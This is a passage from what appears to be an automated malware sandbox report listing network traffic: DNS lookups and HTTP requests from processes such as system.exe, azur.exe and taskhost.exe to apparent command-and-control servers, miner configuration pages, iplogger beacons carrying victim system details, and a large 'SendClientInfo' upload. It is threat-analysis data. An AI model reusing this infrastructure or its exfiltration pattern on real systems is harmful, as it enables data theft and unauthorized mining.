                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 12:01:17 GMT
                                                                                                                                                                                                                                                                            ETag: "e-5aff9d755a10d"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 14
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ex20mac/configCPUX.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ex20mac/configCPUX.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:56 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:06 GMT
                                                                                                                                                                                                                                                                            ETag: "6b-5aff4677b0734"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 107
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/LTC.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /LTC.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:59 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
                                                                                                                                                                                                                                                                            ETag: "22-5aff4671e9f6e"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 34
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/BTC.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /BTC.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:41:01 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:31:59 GMT
                                                                                                                                                                                                                                                                            ETag: "22-5aff46713647c"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 34
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ETH.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ETH.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:41:02 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
                                                                                                                                                                                                                                                                            ETag: "2a-5aff467198e94"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ZEC.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ZEC.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:41:03 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
                                                                                                                                                                                                                                                                            ETag: "23-5aff467226829"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 35
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/DOGE.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /DOGE.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:41:04 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
                                                                                                                                                                                                                                                                            ETag: "22-5aff46717b9d7"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 34
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            stcubegames.netxi.in
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            stcubegames.netxi.in
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            stcubegames.netxi.in
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            185.143.145.9
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            POST
                                                                                                                                                                                                                                                                            http://stcubegames.netxi.in/index.php
                                                                                                                                                                                                                                                                            azur.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.143.145.9:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            POST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                                                                                                                                                                                                                            Host: stcubegames.netxi.in
                                                                                                                                                                                                                                                                            Content-Length: 101
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:52 GMT
                                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                                            X-Powered-By: PHP/7.1.33
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            POST
                                                                                                                                                                                                                                                                            http://stcubegames.netxi.in/index.php
                                                                                                                                                                                                                                                                            azur.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.143.145.9:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            POST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                                                                                                                                                                                                                            Host: stcubegames.netxi.in
                                                                                                                                                                                                                                                                            Content-Length: 4417
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:54 GMT
                                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                                            X-Powered-By: PHP/7.1.33
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            raw.githubusercontent.com
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            raw.githubusercontent.com
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            raw.githubusercontent.com
                                                                                                                                                                                                                                                                            IN CNAME
                                                                                                                                                                                                                                                                            github.map.fastly.net
                                                                                                                                                                                                                                                                            github.map.fastly.net
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            151.101.0.133
                                                                                                                                                                                                                                                                            github.map.fastly.net
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            151.101.64.133
                                                                                                                                                                                                                                                                            github.map.fastly.net
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            151.101.128.133
                                                                                                                                                                                                                                                                            github.map.fastly.net
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            151.101.192.133
                                                                                                                                                                                                                                                                          • flag-unknown
  • GET https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
    Process: RDPWInst.exe
    Remote address: 151.101.0.133:443
    Request
      GET /stascorp/rdpwrap/master/res/rdpwrap.ini HTTP/1.1
      User-Agent: RDP Wrapper Update
      Host: raw.githubusercontent.com
      Cache-Control: no-cache
    Response
      HTTP/1.1 200 OK
      Connection: keep-alive
      Content-Length: 126604
      Content-Type: text/plain; charset=utf-8
      Cache-Control: max-age=300
      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
      ETag: "ff6f7c1136ec33d71e74660fded1c5ee496fc5f36541436dc7e4b7c03f0f75a4"
      Strict-Transport-Security: max-age=31536000
      X-Content-Type-Options: nosniff
      X-Frame-Options: deny
      X-XSS-Protection: 1; mode=block
      Via: 1.1 varnish (Varnish/6.0), 1.1 varnish
      X-GitHub-Request-Id: 77CC:215E:162CC17:174CC85:5FB4DBD8
      Accept-Ranges: bytes
      Date: Wed, 18 Nov 2020 13:40:52 GMT
      X-Served-By: cache-ams21063-AMS
      X-Cache: HIT, HIT
      X-Cache-Hits: 3, 1
      X-Timer: S1605706852.196012,VS0,VE1
      Vary: Authorization,Accept-Encoding, Accept-Encoding
      Access-Control-Allow-Origin: *
      X-Fastly-Request-ID: e0d1506eedd57427870340371a5a28b4f6feb6a4
      Expires: Wed, 18 Nov 2020 13:45:52 GMT
      Source-Age: 103
  • DNS iplogger.org
    Remote address: 8.8.8.8:53
    Request
      iplogger.org IN A
    Response
      iplogger.org IN A 88.99.66.31
  • GET https://iplogger.org/1qW3y7
    Process: update.bin.exe
    Remote address: 88.99.66.31:443
    Request
      GET /1qW3y7 HTTP/1.1
      User-Agent: UserName: Admin / System: Windows 10 X64 / GPU: SeaBIOS VBE(C) 2011 / RAM: 4 / CPU: Persocon Processor 2.5+, 2 Cores (Session: 26444)
      Host: iplogger.org
      Cache-Control: no-cache
    Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Wed, 18 Nov 2020 13:40:54 GMT
      Content-Type: image/png
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=oo6moggetpd61vt6j76plblok6; path=/; HttpOnly
      Pragma: no-cache
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Cache-Control: no-cache
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Answers:
      whoami: 47352d4554663a59d80759e37d0d0d37790bef9cc35fcdd15935e3650cb30a7f
      Strict-Transport-Security: max-age=31536000; preload
      X-Frame-Options: DENY
  • DNS raw.githubusercontent.com
    Remote address: 8.8.8.8:53
    Request
      raw.githubusercontent.com IN A
    Response
      raw.githubusercontent.com IN CNAME github.map.fastly.net
      github.map.fastly.net IN A 151.101.0.133
      github.map.fastly.net IN A 151.101.64.133
      github.map.fastly.net IN A 151.101.128.133
      github.map.fastly.net IN A 151.101.192.133
  • GET https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
    Process: RDPWInst.exe
    Remote address: 151.101.0.133:443
    Request
      GET /stascorp/rdpwrap/master/res/rdpwrap.ini HTTP/1.1
      User-Agent: RDP Wrapper Update
      Host: raw.githubusercontent.com
      Cache-Control: no-cache
    Response
      HTTP/1.1 200 OK
      Connection: keep-alive
      Content-Length: 126604
      Content-Type: text/plain; charset=utf-8
      Cache-Control: max-age=300
      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
      ETag: "ff6f7c1136ec33d71e74660fded1c5ee496fc5f36541436dc7e4b7c03f0f75a4"
      Strict-Transport-Security: max-age=31536000
      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                            Via: 1.1 varnish (Varnish/6.0), 1.1 varnish
                                                                                                                                                                                                                                                                            X-GitHub-Request-Id: 77CC:215E:162CC17:174CC85:5FB4DBD8
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:55 GMT
                                                                                                                                                                                                                                                                            X-Served-By: cache-ams21070-AMS
                                                                                                                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                            X-Cache-Hits: 3, 1
                                                                                                                                                                                                                                                                            X-Timer: S1605706855.206239,VS0,VE1
                                                                                                                                                                                                                                                                            Vary: Authorization,Accept-Encoding, Accept-Encoding
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            X-Fastly-Request-ID: 51477f7d015767cb2562bc4474ee7a1c88d1208f
                                                                                                                                                                                                                                                                            Expires: Wed, 18 Nov 2020 13:45:55 GMT
                                                                                                                                                                                                                                                                            Source-Age: 106
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            POST
                                                                                                                                                                                                                                                                            http://109.248.11.161:35253/IRemotePanel
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.161:35253
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            POST /IRemotePanel HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                                                            SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"
                                                                                                                                                                                                                                                                            Host: 109.248.11.161:35253
                                                                                                                                                                                                                                                                            Content-Length: 136
                                                                                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Content-Length: 1052
                                                                                                                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:56 GMT
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            POST
                                                                                                                                                                                                                                                                            http://109.248.11.161:35253/IRemotePanel
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.161:35253
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            POST /IRemotePanel HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                                                            SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo"
                                                                                                                                                                                                                                                                            Host: 109.248.11.161:35253
                                                                                                                                                                                                                                                                            Content-Length: 2832524
                                                                                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Content-Length: 147
                                                                                                                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:41:03 GMT
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            POST
                                                                                                                                                                                                                                                                            http://109.248.11.161:35253/IRemotePanel
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.161:35253
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            POST /IRemotePanel HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                                                            SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks"
                                                                                                                                                                                                                                                                            Host: 109.248.11.161:35253
                                                                                                                                                                                                                                                                            Content-Length: 583867
                                                                                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Content-Length: 248
                                                                                                                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:41:03 GMT
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            api.ip.sb
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            api.ip.sb
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            api.ip.sb
                                                                                                                                                                                                                                                                            IN CNAME
                                                                                                                                                                                                                                                                            api.ip.sb.cdn.cloudflare.net
                                                                                                                                                                                                                                                                            api.ip.sb.cdn.cloudflare.net
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            104.26.12.31
                                                                                                                                                                                                                                                                            api.ip.sb.cdn.cloudflare.net
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            172.67.75.172
                                                                                                                                                                                                                                                                            api.ip.sb.cdn.cloudflare.net
  IN A
  104.26.13.31
• GET https://api.ip.sb/geoip
  system.exe
  Remote address: 104.26.12.31:443
  Request
  GET /geoip HTTP/1.1
  Host: api.ip.sb
  Connection: Keep-Alive
  Response
  HTTP/1.1 200 OK
  Date: Wed, 18 Nov 2020 13:40:57 GMT
  Content-Type: application/json; charset=utf-8
  Content-Length: 285
  Connection: keep-alive
  Set-Cookie: __cfduid=dc515cde5967682d0c746fe8a8af81c6e1605706857; expires=Fri, 18-Dec-20 13:40:57 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax
  Vary: Accept-Encoding
  Vary: Accept-Encoding
  Cache-Control: no-cache
  Access-Control-Allow-Origin: *
  CF-Cache-Status: DYNAMIC
  cf-request-id: 067d2f52f80000d8edd3297000000001
  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wOIpaFkIOmg6pBnjDW6IEZkYf1pxy7TJ8r%2BTs7DfobsT9npOBZRZ5PDRk22nQQM%2BCdZJ7MC6m0zT8kiIUt42%2B33tc13%2FBxtVH6Q%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Server: cloudflare
  CF-RAY: 5f421b318be4d8ed-AMS
• DNS checkip.amazonaws.com
  Remote address: 8.8.8.8:53
  Request
  checkip.amazonaws.com
  IN A
  Response
  checkip.amazonaws.com
  IN CNAME
  checkip.check-ip.aws.a2z.com
  checkip.check-ip.aws.a2z.com
  IN CNAME
  checkip.us-east-1.prod.check-ip.aws.a2z.com
  checkip.us-east-1.prod.check-ip.aws.a2z.com
  IN A
  52.206.184.85
  checkip.us-east-1.prod.check-ip.aws.a2z.com
  IN A
  34.200.69.241
  checkip.us-east-1.prod.check-ip.aws.a2z.com
  IN A
  107.21.162.206
  checkip.us-east-1.prod.check-ip.aws.a2z.com
  IN A
  18.209.89.50
  checkip.us-east-1.prod.check-ip.aws.a2z.com
  IN A
  52.20.197.7
  checkip.us-east-1.prod.check-ip.aws.a2z.com
  IN A
  52.204.109.97
  checkip.us-east-1.prod.check-ip.aws.a2z.com
  IN A
  23.21.27.29
  checkip.us-east-1.prod.check-ip.aws.a2z.com
  IN A
  3.222.126.94
• DNS iplogger.org
  Remote address: 8.8.8.8:53
  Request
  iplogger.org
  IN A
  Response
  iplogger.org
  IN A
  88.99.66.31
• GET https://iplogger.org/1B2Cw7
  utorrent.exe
  Remote address: 88.99.66.31:443
  Request
  GET /1B2Cw7 HTTP/1.1
  User-Agent: UserName: Admin / System: Windows 10 X64 / GPU: SeaBIOS VBE(C) 2011 / RAM: 4 / CPU: Persocon Processor 2.5+, 2 Cores (Session: 80801)
  Host: iplogger.org
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 18 Nov 2020 13:40:57 GMT
  Content-Type: image/png
  Transfer-Encoding: chunked
  Connection: keep-alive
  Set-Cookie: PHPSESSID=1t0cj29pni5fg4jvu99a7j1pv4; path=/; HttpOnly
  Pragma: no-cache
  Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
  Cache-Control: no-cache
  Expires: Thu, 01 Jan 1970 00:00:01 GMT
  Answers:
  whoami: 59f4dd9a694e2487eb52fdab974df495f688f056de5f54acf0a5e9c72cca29b9
  Strict-Transport-Security: max-age=31536000; preload
  X-Frame-Options: DENY
• GET http://checkip.amazonaws.com/
  system.exe
  Remote address: 52.206.184.85:80
  Request
  GET / HTTP/1.1
  Host: checkip.amazonaws.com
  Connection: Keep-Alive
  Response
  HTTP/1.1 200 OK
  Date: Wed, 18 Nov 2020 13:40:57 GMT
  Server: lighttpd/1.4.53
  Content-Length: 13
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            IN CNAME
                                                                                                                                                                                                                                                                            ianawhois.vip.icann.org
                                                                                                                                                                                                                                                                            ianawhois.vip.icann.org
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            192.0.32.59
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN CNAME
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            196.192.115.21
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            196.216.2.20
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            196.216.2.21
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            www.geoplugin.net
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            www.geoplugin.net
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            www.geoplugin.net
                                                                                                                                                                                                                                                                            IN CNAME
                                                                                                                                                                                                                                                                            geoplugin.net
                                                                                                                                                                                                                                                                            geoplugin.net
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            178.237.33.50
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://www.geoplugin.net/json.gp?ip=154.61.71.51
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            178.237.33.50:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /json.gp?ip=154.61.71.51 HTTP/1.1
                                                                                                                                                                                                                                                                            Host: www.geoplugin.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:41:34 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                            Content-Length: 930
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            IN CNAME
                                                                                                                                                                                                                                                                            ianawhois.vip.icann.org
                                                                                                                                                                                                                                                                            ianawhois.vip.icann.org
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            192.0.32.59
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
